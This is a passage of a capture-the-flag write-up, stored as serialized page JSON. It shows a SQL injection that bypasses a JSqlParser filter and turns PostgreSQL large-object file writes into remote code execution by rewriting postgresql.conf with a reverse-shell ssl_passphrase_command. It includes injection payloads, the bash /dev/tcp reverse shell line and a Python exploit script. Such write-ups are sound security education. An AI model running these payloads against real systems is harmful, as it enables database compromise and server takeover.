6},{"class":85,"line":169},[2357],{"type":32,"tag":83,"props":2358,"children":2359},{},[2360],{"type":38,"value":2361},"Column\n",{"type":32,"tag":47,"props":2363,"children":2364},{},[2365,2367,2373,2375,2381],{"type":38,"value":2366},"Spoiler, the function ",{"type":32,"tag":79,"props":2368,"children":2370},{"className":2369},[],[2371],{"type":38,"value":2372},"query_to_xml",{"type":38,"value":2374}," returns a ",{"type":32,"tag":79,"props":2376,"children":2378},{"className":2377},[],[2379],{"type":38,"value":2380},"Function",{"type":38,"value":2382}," type. So we need to trick the filter into believing that the object it returns is one of the allowed types.",{"type":32,"tag":47,"props":2384,"children":2385},{},[2386,2388,2394,2396,2402,2404,2409],{"type":38,"value":2387},"The left and right parts are determined by the ",{"type":32,"tag":79,"props":2389,"children":2391},{"className":2390},[],[2392],{"type":38,"value":2393},"getLeft",{"type":38,"value":2395}," and ",{"type":32,"tag":79,"props":2397,"children":2399},{"className":2398},[],[2400],{"type":38,"value":2401},"getRight",{"type":38,"value":2403}," functions of the library ",{"type":32,"tag":79,"props":2405,"children":2407},{"className":2406},[],[2408],{"type":38,"value":1840},{"type":38,"value":629},{"type":32,"tag":47,"props":2411,"children":2412},{},[2413],{"type":38,"value":2414},"For example, if we submit the following query:",{"type":32,"tag":68,"props":2416,"children":2417},{"lang":515},[2418],{"type":32,"tag":73,"props":2419,"children":2421},{"code":2420},"username=a'||'b'||'c'||'d&passwd=a\n",[2422],{"type":32,"tag":79,"props":2423,"children":2424},{"__ignoreMap":7},[2425],{"type":38,"value":2420},{"type":32,"tag":47,"props":2427,"children":2428},{},[2429,2431,2437,2439,2445],{"type":38,"value":2430},"If we add a bit of debugging, we can see that at the end of the recursion, the left part will be 
",{"type":32,"tag":79,"props":2432,"children":2434},{"className":2433},[],[2435],{"type":38,"value":2436},"a",{"type":38,"value":2438}," and the right part will be ",{"type":32,"tag":79,"props":2440,"children":2442},{"className":2441},[],[2443],{"type":38,"value":2444},"b",{"type":38,"value":2446},". It means that c and d are not processed by the check function.",{"type":32,"tag":68,"props":2448,"children":2449},{"lang":515},[2450],{"type":32,"tag":73,"props":2451,"children":2453},{"code":2452,"language":515,"meta":7,"className":2293,"style":7},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",[2454],{"type":32,"tag":79,"props":2455,"children":2456},{"__ignoreMap":7},[2457,2465,2473,2481,2489],{"type":32,"tag":83,"props":2458,"children":2459},{"class":85,"line":86},[2460],{"type":32,"tag":83,"props":2461,"children":2462},{},[2463],{"type":38,"value":2464},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":32,"tag":83,"props":2466,"children":2467},{"class":85,"line":102},[2468],{"type":32,"tag":83,"props":2469,"children":2470},{},[2471],{"type":38,"value":2472},"app-1  | [SQLParser.restrictExpr] left_expr: 'A'\n",{"type":32,"tag":83,"props":2474,"children":2475},{"class":85,"line":112},[2476],{"type":32,"tag":83,"props":2477,"children":2478},{},[2479],{"type":38,"value":2480},"app-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\n",{"type":32,"tag":83,"props":2482,"children":2483},{"class":85,"line":126},[2484],{"type":32,"tag":83,"props":2485,"children":2486},{},[2487],{"type":38,"value":2488},"app-1  | 
[SQLParser.restrictExpr] right_expr: 'B'\n",{"type":32,"tag":83,"props":2490,"children":2491},{"class":85,"line":135},[2492],{"type":32,"tag":83,"props":2493,"children":2494},{},[2495],{"type":38,"value":2496},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || 'C' || 'D'\n",{"type":32,"tag":47,"props":2498,"children":2499},{},[2500,2502,2508],{"type":38,"value":2501},"And we can see that both parts are indeed of type ",{"type":32,"tag":79,"props":2503,"children":2505},{"className":2504},[],[2506],{"type":38,"value":2507},"StringValue",{"type":38,"value":629},{"type":32,"tag":47,"props":2510,"children":2511},{},[2512],{"type":38,"value":2513},"So we can inject what we want in the right part provided it's concatenated with a string like this:",{"type":32,"tag":68,"props":2515,"children":2516},{"lang":515},[2517],{"type":32,"tag":73,"props":2518,"children":2520},{"code":2519},"username=a'||'b'||INJECTION||'&passwd=a\n",[2521],{"type":32,"tag":79,"props":2522,"children":2523},{"__ignoreMap":7},[2524],{"type":38,"value":2519},{"type":32,"tag":47,"props":2526,"children":2527},{},[2528,2530,2536],{"type":38,"value":2529},"We can try with a simple injection like ",{"type":32,"tag":79,"props":2531,"children":2533},{"className":2532},[],[2534],{"type":38,"value":2535},"Select 1",{"type":38,"value":2537},":",{"type":32,"tag":68,"props":2539,"children":2540},{"lang":515},[2541],{"type":32,"tag":73,"props":2542,"children":2544},{"code":2543},"username=a'||'b'||query_to_xml(chr(115)||chr(101)||chr(108)||chr(101)||chr(99)||chr(116)||chr(32)||chr(49),true,true,'')||'&passwd=a\n",[2545],{"type":32,"tag":79,"props":2546,"children":2547},{"__ignoreMap":7},[2548],{"type":38,"value":2543},{"type":32,"tag":47,"props":2550,"children":2551},{},[2552],{"type":38,"value":2553},"We can see in the logs that the query is accepted by the 
filter.",{"type":32,"tag":68,"props":2555,"children":2556},{"lang":515},[2557],{"type":32,"tag":73,"props":2558,"children":2560},{"code":2559,"language":515,"meta":7,"className":2293,"style":7},"app-1  | [SQLParser.restrictExpr] left_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] left_expr: 'A'\napp-1  | [SQLParser.restrictExpr] right_expr.getClass(): class net.sf.jsqlparser.expression.StringValue\napp-1  | [SQLParser.restrictExpr] right_expr: 'B'\napp-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",[2561],{"type":32,"tag":79,"props":2562,"children":2563},{"__ignoreMap":7},[2564,2571,2578,2585,2592],{"type":32,"tag":83,"props":2565,"children":2566},{"class":85,"line":86},[2567],{"type":32,"tag":83,"props":2568,"children":2569},{},[2570],{"type":38,"value":2464},{"type":32,"tag":83,"props":2572,"children":2573},{"class":85,"line":102},[2574],{"type":32,"tag":83,"props":2575,"children":2576},{},[2577],{"type":38,"value":2472},{"type":32,"tag":83,"props":2579,"children":2580},{"class":85,"line":112},[2581],{"type":32,"tag":83,"props":2582,"children":2583},{},[2584],{"type":38,"value":2480},{"type":32,"tag":83,"props":2586,"children":2587},{"class":85,"line":126},[2588],{"type":32,"tag":83,"props":2589,"children":2590},{},[2591],{"type":38,"value":2488},{"type":32,"tag":83,"props":2593,"children":2594},{"class":85,"line":135},[2595],{"type":32,"tag":83,"props":2596,"children":2597},{},[2598],{"type":38,"value":2599},"app-1  | [SQLParser.processSelect] expression: USERNAME = 'A' || 'B' || QUERY_TO_XML(CHR(115) || CHR(101) || CHR(108) || CHR(101) || CHR(99) || CHR(116) || CHR(32) || CHR(49), TRUE, TRUE, '') || ''\n",{"type":32,"tag":47,"props":2601,"children":2602},{},[2603],{"type":38,"value":2604},"On the return of the request we can also see we don't have any error 
message telling us that the query is not accepted. So we can say that the query is accepted by the filter.",{"type":32,"tag":57,"props":2606,"children":2608},{"imgSrc":2607},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559128/writeups/chatter-box/sqli_ok.webp",[],{"type":32,"tag":40,"props":2610,"children":2612},{"id":2611},"from-postgresqli-to-rce-unintended",[2613],{"type":38,"value":2614},"From postgreSQLI to RCE [UNINTENDED]",{"type":32,"tag":47,"props":2616,"children":2617},{},[2618],{"type":38,"value":2619},"No we can easily leak password of admin user, with visible sql error, with a payload like this:",{"type":32,"tag":68,"props":2621,"children":2622},{"lang":515},[2623],{"type":32,"tag":73,"props":2624,"children":2626},{"code":2625},"(SELECT CAST((SELECT passwd FROM message_users LIMIT 1) AS int))\n",[2627],{"type":32,"tag":79,"props":2628,"children":2629},{"__ignoreMap":7},[2630],{"type":38,"value":2625},{"type":32,"tag":47,"props":2632,"children":2633},{},[2634,2636,2642,2643,2649],{"type":38,"value":2635},"But after several hours of research on the other controllers (",{"type":32,"tag":79,"props":2637,"children":2639},{"className":2638},[],[2640],{"type":38,"value":2641},"NotifyController",{"type":38,"value":2395},{"type":32,"tag":79,"props":2644,"children":2646},{"className":2645},[],[2647],{"type":38,"value":2648},"MessageBoardController",{"type":38,"value":2650},"). We was not able to go further. 
So we thought that these controllers were rabbit-holes.",{"type":32,"tag":47,"props":2652,"children":2653},{},[2654],{"type":38,"value":2655},"So we tried to research how to deepen the SQL injection in order to execute code on the server.",{"type":32,"tag":47,"props":2657,"children":2658},{},[2659],{"type":38,"value":2660},"So now we can ask ourselves, from a select statement in postgresql how can we interact with the server in order to compromise it and execute code?",{"type":32,"tag":497,"props":2662,"children":2664},{"id":2663},"arbitrary-file-write-read",[2665],{"type":38,"value":2666},"Arbitrary file write / read",{"type":32,"tag":47,"props":2668,"children":2669},{},[2670],{"type":38,"value":2671},"PostgreSQL's large object facility offers stream-style access to user data stored in a specialized large-object structure. This streaming access proves valuable when dealing with data values that are impractical to manipulate as a complete entity due to their size.",{"type":32,"tag":47,"props":2673,"children":2674},{},[2675],{"type":38,"value":2676},"Thus, we can read and write files on the server using large objects.",{"type":32,"tag":47,"props":2678,"children":2679},{},[2680,2682,2688,2690,2696],{"type":38,"value":2681},"Unfortunately, the postgres user of the docker does not have the necessary rights to read the ",{"type":32,"tag":79,"props":2683,"children":2685},{"className":2684},[],[2686],{"type":38,"value":2687},"/flag",{"type":38,"value":2689}," file, so we must at all costs execute the elf ",{"type":32,"tag":79,"props":2691,"children":2693},{"className":2692},[],[2694],{"type":38,"value":2695},"/readflag",{"type":38,"value":629},{"type":32,"tag":47,"props":2698,"children":2699},{},[2700],{"type":38,"value":2701},"So we will focus on how to write files to the server:",{"type":32,"tag":47,"props":2703,"children":2704},{},[2705,2707,2713,2715,2721],{"type":38,"value":2706},"For this, we must use the 
",{"type":32,"tag":79,"props":2708,"children":2710},{"className":2709},[],[2711],{"type":38,"value":2712},"lo_frombytea",{"type":38,"value":2714}," function, which allows writing to a large postgresql object and finally call the ",{"type":32,"tag":79,"props":2716,"children":2718},{"className":2717},[],[2719],{"type":38,"value":2720},"lo_export",{"type":38,"value":2722}," function with the path that allows writing the large object to the server disk.",{"type":32,"tag":68,"props":2724,"children":2725},{"lang":7},[2726],{"type":32,"tag":73,"props":2727,"children":2729},{"code":2728},"SELECT lo_from_bytea(10000, decode('cHduZWQK', 'base64'))\nSELECT lo_export(10000, '/tmp/pwn')\n",[2730],{"type":32,"tag":79,"props":2731,"children":2732},{"__ignoreMap":7},[2733],{"type":38,"value":2728},{"type":32,"tag":47,"props":2735,"children":2736},{},[2737],{"type":38,"value":2738},"Note that both functions take as a first parameter an identifier, allowing to identify a large object, it is possible to put any identifier as long as it is not already used.",{"type":32,"tag":47,"props":2740,"children":2741},{},[2742],{"type":38,"value":2743},"After executing these two functions, we can see that the /tmp/pwn file has been successfully created with its content",{"type":32,"tag":57,"props":2745,"children":2747},{"imgSrc":2746,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559178/writeups/chatter-box/file_write_pwn.webp",[],{"type":32,"tag":47,"props":2749,"children":2750},{},[2751],{"type":38,"value":2752},"We now have a POC that allows writing files to the system. 
Also note that these functions can also allow rewriting a file already created.",{"type":32,"tag":497,"props":2754,"children":2756},{"id":2755},"postgresqlconf",[2757],{"type":38,"value":2758},"postgresql.conf",{"type":32,"tag":47,"props":2760,"children":2761},{},[2762,2764,2769],{"type":38,"value":2763},"Once we have been able to rewrite files, we may ask ourselves which file would be interesting to rewrite? The ",{"type":32,"tag":79,"props":2765,"children":2767},{"className":2766},[],[2768],{"type":38,"value":2758},{"type":38,"value":2770}," file of course !!",{"type":32,"tag":47,"props":2772,"children":2773},{},[2774],{"type":38,"value":2775},"An interesting option in the postgresql configuration is the \"ssl_passphrase_command\" option.",{"type":32,"tag":57,"props":2777,"children":2779},{"imgSrc":2778,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559212/writeups/chatter-box/doc_passphrase_command.webp",[],{"type":32,"tag":47,"props":2781,"children":2782},{},[2783],{"type":38,"value":2784},"This option allows to execute a command if the ssl key is encrypted with a passphrase.",{"type":32,"tag":47,"props":2786,"children":2787},{},[2788],{"type":38,"value":2789},"We must therefore generate a new key that includes a passphrase, so we will use the following command:",{"type":32,"tag":68,"props":2791,"children":2793},{"lang":2792},"bash",[2794],{"type":32,"tag":73,"props":2795,"children":2798},{"code":2796,"language":2792,"meta":7,"className":2797,"style":7},"openssl rsa -aes256 -in /etc/ssl/private/ssl-cert-snakeoil.key -out ./my_new_key\n","language-bash shiki shiki-themes 
vitesse-dark",[2799],{"type":32,"tag":79,"props":2800,"children":2801},{"__ignoreMap":7},[2802],{"type":32,"tag":83,"props":2803,"children":2804},{"class":85,"line":86},[2805,2810,2815,2820,2825,2830,2835],{"type":32,"tag":83,"props":2806,"children":2807},{"style":576},[2808],{"type":38,"value":2809},"openssl",{"type":32,"tag":83,"props":2811,"children":2812},{"style":338},[2813],{"type":38,"value":2814}," rsa",{"type":32,"tag":83,"props":2816,"children":2817},{"style":651},[2818],{"type":38,"value":2819}," -aes256",{"type":32,"tag":83,"props":2821,"children":2822},{"style":651},[2823],{"type":38,"value":2824}," -in",{"type":32,"tag":83,"props":2826,"children":2827},{"style":338},[2828],{"type":38,"value":2829}," /etc/ssl/private/ssl-cert-snakeoil.key",{"type":32,"tag":83,"props":2831,"children":2832},{"style":651},[2833],{"type":38,"value":2834}," -out",{"type":32,"tag":83,"props":2836,"children":2837},{"style":338},[2838],{"type":38,"value":2839}," ./my_new_key\n",{"type":32,"tag":47,"props":2841,"children":2842},{},[2843],{"type":38,"value":2844},"Result of the command:",{"type":32,"tag":57,"props":2846,"children":2848},{"imgSrc":2847},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559241/writeups/chatter-box/rsa_command.webp",[],{"type":32,"tag":47,"props":2850,"children":2851},{},[2852],{"type":38,"value":2853},"Once our key is generated, we must find a file to rewrite with 600 rights. 
If our file containing the key does not have these rights then the server will not accept it will raise an exception.",{"type":32,"tag":47,"props":2855,"children":2856},{},[2857],{"type":38,"value":2858},"To search this specifics files we use the following command:",{"type":32,"tag":68,"props":2860,"children":2861},{"lang":2792},[2862],{"type":32,"tag":73,"props":2863,"children":2865},{"code":2864,"language":2792,"meta":7,"className":2797,"style":7},"find /var/lib/postgresql/13/ -type f -perm 600 -user postgres -writable 2>&-\n",[2866],{"type":32,"tag":79,"props":2867,"children":2868},{"__ignoreMap":7},[2869],{"type":32,"tag":83,"props":2870,"children":2871},{"class":85,"line":86},[2872,2877,2882,2887,2892,2897,2902,2907,2912,2917,2922],{"type":32,"tag":83,"props":2873,"children":2874},{"style":576},[2875],{"type":38,"value":2876},"find",{"type":32,"tag":83,"props":2878,"children":2879},{"style":338},[2880],{"type":38,"value":2881}," /var/lib/postgresql/13/",{"type":32,"tag":83,"props":2883,"children":2884},{"style":651},[2885],{"type":38,"value":2886}," -type",{"type":32,"tag":83,"props":2888,"children":2889},{"style":338},[2890],{"type":38,"value":2891}," f",{"type":32,"tag":83,"props":2893,"children":2894},{"style":651},[2895],{"type":38,"value":2896}," -perm",{"type":32,"tag":83,"props":2898,"children":2899},{"style":720},[2900],{"type":38,"value":2901}," 600",{"type":32,"tag":83,"props":2903,"children":2904},{"style":651},[2905],{"type":38,"value":2906}," -user",{"type":32,"tag":83,"props":2908,"children":2909},{"style":338},[2910],{"type":38,"value":2911}," postgres",{"type":32,"tag":83,"props":2913,"children":2914},{"style":651},[2915],{"type":38,"value":2916}," -writable",{"type":32,"tag":83,"props":2918,"children":2919},{"style":455},[2920],{"type":38,"value":2921}," 
2>&",{"type":32,"tag":83,"props":2923,"children":2924},{"style":338},[2925],{"type":38,"value":2926},"-\n",{"type":32,"tag":47,"props":2928,"children":2929},{},[2930],{"type":38,"value":2844},{"type":32,"tag":57,"props":2932,"children":2934},{"imgSrc":2933},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559268/writeups/chatter-box/find_command.webp",[],{"type":32,"tag":47,"props":2936,"children":2937},{},[2938,2940,2946],{"type":38,"value":2939},"So the most interesting file in our case is the ",{"type":32,"tag":79,"props":2941,"children":2943},{"className":2942},[],[2944],{"type":38,"value":2945},"PG_VERSION",{"type":38,"value":2947}," file. After our upload it will contain the content of our key.",{"type":32,"tag":47,"props":2949,"children":2950},{},[2951],{"type":38,"value":2952},"Our postgresql configuration will be as follows:",{"type":32,"tag":68,"props":2954,"children":2956},{"lang":2955},"conf",[2957],{"type":32,"tag":73,"props":2958,"children":2961},{"code":2959,"language":2955,"meta":7,"className":2960,"style":7},"# - SSL -\n\nssl = on\nssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\nssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\nssl_passphrase_command_supports_reload = on\nssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n","language-conf shiki shiki-themes vitesse-dark",[2962],{"type":32,"tag":79,"props":2963,"children":2964},{"__ignoreMap":7},[2965,2973,2980,2988,2996,3004,3012],{"type":32,"tag":83,"props":2966,"children":2967},{"class":85,"line":86},[2968],{"type":32,"tag":83,"props":2969,"children":2970},{},[2971],{"type":38,"value":2972},"# - SSL 
-\n",{"type":32,"tag":83,"props":2974,"children":2975},{"class":85,"line":102},[2976],{"type":32,"tag":83,"props":2977,"children":2978},{"emptyLinePlaceholder":106},[2979],{"type":38,"value":109},{"type":32,"tag":83,"props":2981,"children":2982},{"class":85,"line":112},[2983],{"type":32,"tag":83,"props":2984,"children":2985},{},[2986],{"type":38,"value":2987},"ssl = on\n",{"type":32,"tag":83,"props":2989,"children":2990},{"class":85,"line":126},[2991],{"type":32,"tag":83,"props":2992,"children":2993},{},[2994],{"type":38,"value":2995},"ssl_cert_file = '/etc/ssl/certs/ssl-cert-snakeoil.pem'\n",{"type":32,"tag":83,"props":2997,"children":2998},{"class":85,"line":135},[2999],{"type":32,"tag":83,"props":3000,"children":3001},{},[3002],{"type":38,"value":3003},"ssl_key_file = '/var/lib/postgresql/13/main/PG_VERSION'\n",{"type":32,"tag":83,"props":3005,"children":3006},{"class":85,"line":148},[3007],{"type":32,"tag":83,"props":3008,"children":3009},{},[3010],{"type":38,"value":3011},"ssl_passphrase_command_supports_reload = on\n",{"type":32,"tag":83,"props":3013,"children":3014},{"class":85,"line":161},[3015],{"type":32,"tag":83,"props":3016,"children":3017},{},[3018],{"type":38,"value":3019},"ssl_passphrase_command = '/bin/bash -c \"/bin/bash -i >& /dev/tcp/IP/9999 0>&1\"'\n",{"type":32,"tag":47,"props":3021,"children":3022},{},[3023],{"type":38,"value":3024},"Once our configuration is uploaded, we will need to reload the postgresql configuration. 
To do this, we can simply call the pg_reload_conf function which will have the effect of applying the new config.",{"type":32,"tag":40,"props":3026,"children":3028},{"id":3027},"final-payload",[3029],{"type":38,"value":3030},"Final payload",{"type":32,"tag":47,"props":3032,"children":3033},{},[3034],{"type":38,"value":3035},"So to get our RCE we are going to do this step by step:",{"type":32,"tag":364,"props":3037,"children":3038},{},[3039],{"type":32,"tag":368,"props":3040,"children":3041},{},[3042],{"type":38,"value":3043},"Upload the malicious configuration:",{"type":32,"tag":68,"props":3045,"children":3046},{"lang":556},[3047],{"type":32,"tag":73,"props":3048,"children":3050},{"code":3049,"language":556,"meta":7,"className":561,"style":7},"rand_num = random.randint(31337, 31337*5)\n    \nwith open(\"files/conf.b64\", \"r\") as f:\n    conf = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{conf}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/etc/postgresql/13/main/postgresql.conf'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[3051],{"type":32,"tag":79,"props":3052,"children":3053},{"__ignoreMap":7},[3054,3112,3120,3185,3215,3222,3290,3398,3447],{"type":32,"tag":83,"props":3055,"children":3056},{"class":85,"line":86},[3057,3062,3066,3071,3075,3080,3084,3089,3093,3098,3103,3108],{"type":32,"tag":83,"props":3058,"children":3059},{"style":96},[3060],{"type":38,"value":3061},"rand_num ",{"type":32,"tag":83,"props":3063,"children":3064},{"style":433},[3065],{"type":38,"value":607},{"type":32,"tag":83,"props":3067,"children":3068},{"style":96},[3069],{"type":38,"value":3070}," 
random",{"type":32,"tag":83,"props":3072,"children":3073},{"style":433},[3074],{"type":38,"value":629},{"type":32,"tag":83,"props":3076,"children":3077},{"style":96},[3078],{"type":38,"value":3079},"randint",{"type":32,"tag":83,"props":3081,"children":3082},{"style":433},[3083],{"type":38,"value":584},{"type":32,"tag":83,"props":3085,"children":3086},{"style":720},[3087],{"type":38,"value":3088},"31337",{"type":32,"tag":83,"props":3090,"children":3091},{"style":433},[3092],{"type":38,"value":728},{"type":32,"tag":83,"props":3094,"children":3095},{"style":720},[3096],{"type":38,"value":3097}," 31337",{"type":32,"tag":83,"props":3099,"children":3100},{"style":455},[3101],{"type":38,"value":3102},"*",{"type":32,"tag":83,"props":3104,"children":3105},{"style":720},[3106],{"type":38,"value":3107},"5",{"type":32,"tag":83,"props":3109,"children":3110},{"style":433},[3111],{"type":38,"value":798},{"type":32,"tag":83,"props":3113,"children":3114},{"class":85,"line":102},[3115],{"type":32,"tag":83,"props":3116,"children":3117},{"style":96},[3118],{"type":38,"value":3119},"    \n",{"type":32,"tag":83,"props":3121,"children":3122},{"class":85,"line":112},[3123,3128,3133,3137,3141,3146,3150,3154,3158,3163,3167,3171,3176,3180],{"type":32,"tag":83,"props":3124,"children":3125},{"style":90},[3126],{"type":38,"value":3127},"with",{"type":32,"tag":83,"props":3129,"children":3130},{"style":657},[3131],{"type":38,"value":3132}," 
open",{"type":32,"tag":83,"props":3134,"children":3135},{"style":433},[3136],{"type":38,"value":584},{"type":32,"tag":83,"props":3138,"children":3139},{"style":439},[3140],{"type":38,"value":452},{"type":32,"tag":83,"props":3142,"children":3143},{"style":338},[3144],{"type":38,"value":3145},"files/conf.b64",{"type":32,"tag":83,"props":3147,"children":3148},{"style":439},[3149],{"type":38,"value":452},{"type":32,"tag":83,"props":3151,"children":3152},{"style":433},[3153],{"type":38,"value":728},{"type":32,"tag":83,"props":3155,"children":3156},{"style":439},[3157],{"type":38,"value":442},{"type":32,"tag":83,"props":3159,"children":3160},{"style":338},[3161],{"type":38,"value":3162},"r",{"type":32,"tag":83,"props":3164,"children":3165},{"style":439},[3166],{"type":38,"value":452},{"type":32,"tag":83,"props":3168,"children":3169},{"style":433},[3170],{"type":38,"value":869},{"type":32,"tag":83,"props":3172,"children":3173},{"style":90},[3174],{"type":38,"value":3175}," as",{"type":32,"tag":83,"props":3177,"children":3178},{"style":96},[3179],{"type":38,"value":2891},{"type":32,"tag":83,"props":3181,"children":3182},{"style":433},[3183],{"type":38,"value":3184},":\n",{"type":32,"tag":83,"props":3186,"children":3187},{"class":85,"line":126},[3188,3193,3197,3201,3205,3210],{"type":32,"tag":83,"props":3189,"children":3190},{"style":96},[3191],{"type":38,"value":3192},"    conf 
",{"type":32,"tag":83,"props":3194,"children":3195},{"style":433},[3196],{"type":38,"value":607},{"type":32,"tag":83,"props":3198,"children":3199},{"style":96},[3200],{"type":38,"value":2891},{"type":32,"tag":83,"props":3202,"children":3203},{"style":433},[3204],{"type":38,"value":629},{"type":32,"tag":83,"props":3206,"children":3207},{"style":96},[3208],{"type":38,"value":3209},"read",{"type":32,"tag":83,"props":3211,"children":3212},{"style":433},[3213],{"type":38,"value":3214},"()\n",{"type":32,"tag":83,"props":3216,"children":3217},{"class":85,"line":135},[3218],{"type":32,"tag":83,"props":3219,"children":3220},{"emptyLinePlaceholder":106},[3221],{"type":38,"value":109},{"type":32,"tag":83,"props":3223,"children":3224},{"class":85,"line":148},[3225,3230,3234,3238,3242,3246,3251,3255,3260,3264,3269,3273,3277,3281,3286],{"type":32,"tag":83,"props":3226,"children":3227},{"style":96},[3228],{"type":38,"value":3229},"query ",{"type":32,"tag":83,"props":3231,"children":3232},{"style":433},[3233],{"type":38,"value":607},{"type":32,"tag":83,"props":3235,"children":3236},{"style":96},[3237],{"type":38,"value":579},{"type":32,"tag":83,"props":3239,"children":3240},{"style":433},[3241],{"type":38,"value":584},{"type":32,"tag":83,"props":3243,"children":3244},{"style":455},[3245],{"type":38,"value":643},{"type":32,"tag":83,"props":3247,"children":3248},{"style":338},[3249],{"type":38,"value":3250},"\"(SELECT lo_from_bytea(",{"type":32,"tag":83,"props":3252,"children":3253},{"style":651},[3254],{"type":38,"value":654},{"type":32,"tag":83,"props":3256,"children":3257},{"style":96},[3258],{"type":38,"value":3259},"rand_num",{"type":32,"tag":83,"props":3261,"children":3262},{"style":651},[3263],{"type":38,"value":688},{"type":32,"tag":83,"props":3265,"children":3266},{"style":338},[3267],{"type":38,"value":3268},", 
decode('",{"type":32,"tag":83,"props":3270,"children":3271},{"style":651},[3272],{"type":38,"value":654},{"type":32,"tag":83,"props":3274,"children":3275},{"style":96},[3276],{"type":38,"value":2955},{"type":32,"tag":83,"props":3278,"children":3279},{"style":651},[3280],{"type":38,"value":688},{"type":32,"tag":83,"props":3282,"children":3283},{"style":338},[3284],{"type":38,"value":3285},"', 'base64')))\"",{"type":32,"tag":83,"props":3287,"children":3288},{"style":433},[3289],{"type":38,"value":798},{"type":32,"tag":83,"props":3291,"children":3292},{"class":85,"line":161},[3293,3298,3302,3307,3311,3316,3320,3325,3329,3334,3338,3342,3347,3351,3355,3359,3363,3367,3372,3376,3380,3385,3389,3394],{"type":32,"tag":83,"props":3294,"children":3295},{"style":96},[3296],{"type":38,"value":3297},"r ",{"type":32,"tag":83,"props":3299,"children":3300},{"style":433},[3301],{"type":38,"value":607},{"type":32,"tag":83,"props":3303,"children":3304},{"style":96},[3305],{"type":38,"value":3306}," requests",{"type":32,"tag":83,"props":3308,"children":3309},{"style":433},[3310],{"type":38,"value":629},{"type":32,"tag":83,"props":3312,"children":3313},{"style":96},[3314],{"type":38,"value":3315},"post",{"type":32,"tag":83,"props":3317,"children":3318},{"style":433},[3319],{"type":38,"value":584},{"type":32,"tag":83,"props":3321,"children":3322},{"style":651},[3323],{"type":38,"value":3324},"URL_TARGET",{"type":32,"tag":83,"props":3326,"children":3327},{"style":433},[3328],{"type":38,"value":728},{"type":32,"tag":83,"props":3330,"children":3331},{"style":427},[3332],{"type":38,"value":3333}," 
data",{"type":32,"tag":83,"props":3335,"children":3336},{"style":433},[3337],{"type":38,"value":607},{"type":32,"tag":83,"props":3339,"children":3340},{"style":439},[3341],{"type":38,"value":452},{"type":32,"tag":83,"props":3343,"children":3344},{"style":338},[3345],{"type":38,"value":3346},"username=",{"type":32,"tag":83,"props":3348,"children":3349},{"style":439},[3350],{"type":38,"value":452},{"type":32,"tag":83,"props":3352,"children":3353},{"style":455},[3354],{"type":38,"value":468},{"type":32,"tag":83,"props":3356,"children":3357},{"style":96},[3358],{"type":38,"value":589},{"type":32,"tag":83,"props":3360,"children":3361},{"style":455},[3362],{"type":38,"value":468},{"type":32,"tag":83,"props":3364,"children":3365},{"style":439},[3366],{"type":38,"value":452},{"type":32,"tag":83,"props":3368,"children":3369},{"style":338},[3370],{"type":38,"value":3371},"&passwd=admin",{"type":32,"tag":83,"props":3373,"children":3374},{"style":439},[3375],{"type":38,"value":452},{"type":32,"tag":83,"props":3377,"children":3378},{"style":433},[3379],{"type":38,"value":728},{"type":32,"tag":83,"props":3381,"children":3382},{"style":427},[3383],{"type":38,"value":3384}," 
headers",{"type":32,"tag":83,"props":3386,"children":3387},{"style":433},[3388],{"type":38,"value":607},{"type":32,"tag":83,"props":3390,"children":3391},{"style":96},[3392],{"type":38,"value":3393},"headers",{"type":32,"tag":83,"props":3395,"children":3396},{"style":433},[3397],{"type":38,"value":798},{"type":32,"tag":83,"props":3399,"children":3400},{"class":85,"line":169},[3401,3405,3409,3413,3417,3421,3426,3430,3434,3438,3443],{"type":32,"tag":83,"props":3402,"children":3403},{"style":96},[3404],{"type":38,"value":3229},{"type":32,"tag":83,"props":3406,"children":3407},{"style":433},[3408],{"type":38,"value":607},{"type":32,"tag":83,"props":3410,"children":3411},{"style":96},[3412],{"type":38,"value":579},{"type":32,"tag":83,"props":3414,"children":3415},{"style":433},[3416],{"type":38,"value":584},{"type":32,"tag":83,"props":3418,"children":3419},{"style":455},[3420],{"type":38,"value":643},{"type":32,"tag":83,"props":3422,"children":3423},{"style":338},[3424],{"type":38,"value":3425},"\"(SELECT lo_export(",{"type":32,"tag":83,"props":3427,"children":3428},{"style":651},[3429],{"type":38,"value":654},{"type":32,"tag":83,"props":3431,"children":3432},{"style":96},[3433],{"type":38,"value":3259},{"type":32,"tag":83,"props":3435,"children":3436},{"style":651},[3437],{"type":38,"value":688},{"type":32,"tag":83,"props":3439,"children":3440},{"style":338},[3441],{"type":38,"value":3442},", 
